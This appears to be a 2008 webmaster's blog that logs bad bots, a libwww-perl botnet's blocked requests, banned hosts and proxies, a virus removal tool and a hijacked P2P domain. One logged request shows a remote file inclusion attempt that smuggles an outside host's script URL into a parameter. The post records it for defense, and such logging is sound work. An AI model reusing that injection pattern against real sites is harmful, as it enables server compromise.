Agent: libwww-perl/5.808
70.86.201.130 pouch.kangaroopartners.com
Agent: libwww-perl/5.808
70.84.175.98 mail.zoiig.com
Agent: libwww-perl/5.808
69.65.40.218 greenlifestyletoday.com
Agent: libwww-perl/5.805
195.177.193.178 creativestation.co.uk
Agent: libwww-perl/5.808
72.36.179.98 orbitdesignworks.com
Agent: libwww-perl/5.808
65.91.249.193 alef.northtrex.com
Agent: libwww-perl/5.79
64.13.255.23 familyguy.ca
Agent: libwww-perl/5.803
64.49.254.23 server1.opennms.org
Agent: libwww-perl/5.79
72.36.235.74 newinst.greenbaumstaging.com
Agent: libwww-perl/5.79
89.234.7.39 ns3.ctm-it.com
Agent: libwww-perl/5.808
64.141.102.13 64-141-102-13.static.dns77.com
Agent: libwww-perl/5.805
80.177.187.23 no-dns-yet.demon.co.uk
Agent: libwww-perl/5.808
72.29.78.145 72-29-78-145.static.dimenoc.com
Agent: libwww-perl/5.805
87.106.221.124 s15289207.onlinehome-server.info
Agent: libwww-perl/5.808
64.118.86.20 drive28.123servers.com
Agent: libwww-perl/5.808
86.109.105.76
Agent: libwww-perl/5.805
193.33.20.193 master.herrotto.de

Hacker scripts on amyru.h18.ru 70.51.117.24

This joker thought I might be using a filname to load a text file so he tried to load his hacker file. this is not how I program tho so it would do nothing even if his useragent had not been banned.


package=http://amyru.h18.ru/images/cs.txt? GET HTTP/1.1
Agent: wget/1.1 (compatible; i486; linux; redhat7.3)
70.51.117.24

h18.ru should be added to the hackers file.

The host has shutdown amyru.h18.ru
Access you is forbidden cannot obtain access to site amyru.h18.ru of t.k its owner it allowed the crude violation of the conditions of free hosting and was deprived of the right of access. All questions request to direct to hs@agava.com

Feb 14, 2008

MM Autoban

v3.8 has been released this includes all the bug fixes and some minor fixes.

w32.nopir.c-p2p Virus Removal tool

Since I released this tool back in 06 118 people have downloaded it to remove this nasty virus. Once you get it it erases all your music files and then prevents you from booting your system.
Image Hosted by ImageShack.us


Download this program w32.nopir.c-p2p-worm-fix-v2.zip On another computer. Copy it to your computer. Likely will have to use a cd or a disk. Reboot your computer following docs and run the script. It will remove the hack files and the hooks that load them. You should then be able to reboot to windows. This was writen for XP it is unknown how the virus will work on Vista.

Feb 6, 2008

robot sipost.de

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
81.169.162.124 sipost.de

Not sure what this bot is trying to do. It fell into a bot trap.

A visit to sipost.de tells me access forbiden.

So sipost.de is now banned.

dude.websupport.sk is a robot

Agent: -NO AGENT-
81.89.48.230 dude.websupport.sk

Not sure what this one is. But websupport.sk is now banned

NASA Web Robot? host.jsc.nasa.gov

403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
128.157.254.171 host.jsc.nasa.gov

Whats this is NASA running a robot?

maryland.networkphantom.net

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.128.80.15 maryland.networkphantom.net


Another bot. Fell into a bot trap and then tried to post some spam urls after it was banned.

gts2.westmaster.com spambot

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
81.31.32.41 gts2.westmaster.com

This bot came in and fell in a bot trap. It then went about trying to post spam urls after it had been banned.

Jan 29, 2008

Some type of botnet using libwww-perl/5.xxx

This all looks to be related it all showed up at the same time.
Looks to be a bot net.


74.54.29.114,BB2,[01-29-2008-16:01:24],72.1d.364a.static.theplanet.com,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
69.64.77.89,BB2,[01-29-2008-16:01:28],ardentexchange.com,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
85.233.166.54,BB2,[01-29-2008-16:01:43],vps1.unluckyforsome.co.uk,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
87.106.177.9,BB2,[01-29-2008-16:01:45],s15267347.onlinehome-server.info,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
91.142.209.168,BB2,[01-29-2008-16:01:48],sl002.servidores-dns.com,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
88.84.157.36,BB2,[01-29-2008-16:01:51],v32556.1blu.de,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
87.106.183.154,BB2,[01-29-2008-16:01:52],s15277454.onlinehome-server.info,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
85.214.122.224,BB2,[01-29-2008-16:01:56],alte-wutz.de,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
85.214.64.202,BB2,[01-29-2008-16:01:57],psit-domains.de,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
86.109.163.242,BB2,[01-29-2008-16:03:45],lincl435.web3l.com,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
128.205.213.57,BB2,[01-29-2008-16:05:06],hyperion.eng.buffalo.edu,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
74.54.22.2,BB2,[01-29-2008-16:05:25],hm3.hostmas.net,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
66.7.194.105,BB2,[01-29-2008-16:05:26],66-7-194-105.static.dimenoc.com,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
69.61.30.100,BB2,[01-29-2008-16:05:33],alpha.webserverdns.com,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
66.232.101.54,BB2,[01-29-2008-16:06:10],-,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
216.129.112.22,BB2,[01-29-2008-16:06:26],nexenta.com,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
87.233.129.198,BB2,[01-29-2008-16:06:54],mail.tradehousem.com,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
78.110.163.108,BB2,[01-29-2008-16:07:14],server2.suspected.co.uk,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
87.106.37.48,BB2,[01-29-2008-16:08:14],s15207528.onlinehome-server.info,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
64.202.115.189,BB2,[01-29-2008-16:08:51],server.hotelskerala.com,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
74.54.22.2,BB2,[01-29-2008-16:10:32],hm3.hostmas.net,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
66.7.194.105,BB2,[01-29-2008-16:10:45],66-7-194-105.static.dimenoc.com,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
69.61.30.100,BB2,[01-29-2008-16:10:48],alpha.webserverdns.com,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
72.36.154.242,BB2,[01-29-2008-16:10:58],72.36.154.242.svservers.com,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
66.232.101.54,BB2,[01-29-2008-16:11:25],-,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
62.193.224.77,BB2,[01-29-2008-16:11:42],wpc0075.amenworld.com,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
216.129.112.22,BB2,[01-29-2008-16:12:57],nexenta.com,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
87.233.129.198,BB2,[01-29-2008-16:13:21],mail.tradehousem.com,403 User-Agent was found on blacklist ww ,libwww-perl/5.79,-
77.79.88.105,BB2,[01-29-2008-16:13:32],-,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
87.106.37.48,BB2,[01-29-2008-16:14:45],s15207528.onlinehome-server.info,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
64.202.115.189,BB2,[01-29-2008-16:15:01],server.hotelskerala.com,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
82.192.68.176,BB2,[01-29-2008-16:16:07],svhw.woz-visie.nl,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
82.192.68.176,BB2,[01-29-2008-16:16:31],svhw.woz-visie.nl,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
81.171.102.74,BB2,[01-29-2008-16:16:36],webhost3.eweka.nl,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
85.25.139.97,BB2,[01-29-2008-16:16:57],echo643.server4you.de,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
81.171.102.74,BB2,[01-29-2008-16:17:04],webhost3.eweka.nl,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
80.89.224.38,BB2,[01-29-2008-16:17:10],wolfram.noc.iaf.nl,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
80.89.224.38,BB2,[01-29-2008-16:17:35],wolfram.noc.iaf.nl,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
72.36.154.242,BB2,[01-29-2008-16:18:30],72.36.154.242.svservers.com,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
77.79.88.105,BB2,[01-29-2008-16:22:54],-,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
85.25.139.97,BB2,[01-29-2008-16:30:40],echo643.server4you.de,403 User-Agent was found on blacklist ,libwww-perl/5.803,-

woriobot heritrix/1.10.0 +http://worio.com) bot

Mozilla/5.0 (compatible; heritrix/1.6.0 +http://www.worio.com/)
137.82.84.97 worio.com

A new bot just showed up claiming another beta test.

This bot is blocked by Bad Behaivor for using improper headers.

(edited)
Klaas said...
Could you elaborate on the problem with the headers? I'm eager to fix real an perceived problems with our crawler.


Here is the BB error

bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/5.0 (compatible; woriobot heritrix/1.10.0 +http://worio.com)
207.23.252.129 worio.com


Your just going to have to test it on a blog using Bad Behavior.

If it were a worthwhile bot I would whitelist it but since it doesn't do anything yet why bother. If your project ever gets off the ground let me know and I will erase this post.

89.253.240.112 justclickme.org

justclickme.org is running a robot from this IP. It has no agent. a search on google shows a lot of spam links being posted using that url as a redirect to another site.
The webserver at that domain has a canned preset webpage.

Agent: -NO AGENT-
89.253.240.112 justclickme.org

Jan 21, 2008

New proxy server to ban

https://65.110.6.43/ also known as http://proxyweb.net

Add proxyweb.net to the domain ban file and
65.110.6.43 to the IP ban file. Please report any other IPS.

Jan 8, 2008

Shareaza.com domain hijacked

This is not related to robots but since someone took one of my domain's years ago everyone needs to spread the news. Shareaza the open source P2P program has lost its domain name to some pay service. Shareaza has moved to this URL.

The new owners of the domain are pushing some pay software labeled shareazav4.exe this is not the real shareaza which is at this time v2.3.1.0

See this story here P2P File Sharing: Shareaza site hijacked